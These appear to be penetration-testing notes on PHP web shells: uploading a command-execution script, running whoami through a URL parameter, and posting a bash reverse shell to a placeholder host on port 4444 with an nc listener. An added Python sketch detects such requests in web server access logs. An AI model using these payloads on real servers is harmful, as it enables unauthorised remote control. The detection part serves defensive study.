PHP
Upload a PHP code execution script
- File.php =
- In the URL:
- http://x.x.x.x/File.php?msx=whoami
https://www.acunetix.com/websitesecurity/php-security-2/
PHP shell
In the URL, go to shell.php?command=whoami
In Burp Suite, create a POST request:
POST /url/shell.php HTTP/1.1
with the body content:
command=bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'
URL-encode it to:
command=bash+-c+'bash+-i+>%26+/dev/tcp/x.x.x.x/4444+0>%261'
Set up nc to listen for incoming connections: nc -lvnp x.x.x.x 4444
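The requests in these notes leave recognizable traces in the web server access log. The following detection sketch is an added example, not part of the original notes: it flags URL-decoded command strings in query parameters and requests to PHP files missing from a deployment inventory. KNOWN_SCRIPTS, both regexes and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: inventory of PHP files that the application actually deploys.
KNOWN_SCRIPTS = {"/index.php", "/login.php"}
# Assumption: small pattern set covering the command strings shown in these notes.
CMD_RE = re.compile(r"/dev/tcp/|\b(?:whoami|uname|passwd)\b|\b(?:ba)?sh\s+-[ci]\b")
# Common/combined log format: client, timestamp, "METHOD target PROTO", status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /File.php?msx=whoami HTTP/1.1" 200 12 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2024:10:02:10 +0000] "GET /shell.php?command=bash+-c+'bash+-i+>%26+/dev/tcp/198.51.100.9/4444+0>%261' HTTP/1.1" 200 0 "-" "curl/8.0"
203.0.113.7 - - [10/Mar/2024:10:03:30 +0000] "POST /url/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2024:10:04:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2024:10:05:00 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def findings(log_text):
    """Return (client, method, path, reasons) for each suspicious request."""
    out = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, method, target, _status = m.groups()
        url = urlsplit(target)
        reasons = []
        # parse_qsl URL-decodes values, so '+' and %26 become ' ' and '&'
        # before the command patterns are applied.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if CMD_RE.search(value):
                reasons.append(f"command-in-param:{name}")
        # POST bodies are not written to the access log, so a shell driven
        # via POST is only visible here as a script outside the inventory.
        if url.path.lower().endswith(".php") and url.path not in KNOWN_SCRIPTS:
            reasons.append("unknown-script")
        if reasons:
            out.append((client, method, url.path, reasons))
    return out

if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(hit)
```

The inventory rule is the one that catches the POST variant; alerting on command strings alone misses it unless request bodies are logged by a WAF or reverse proxy.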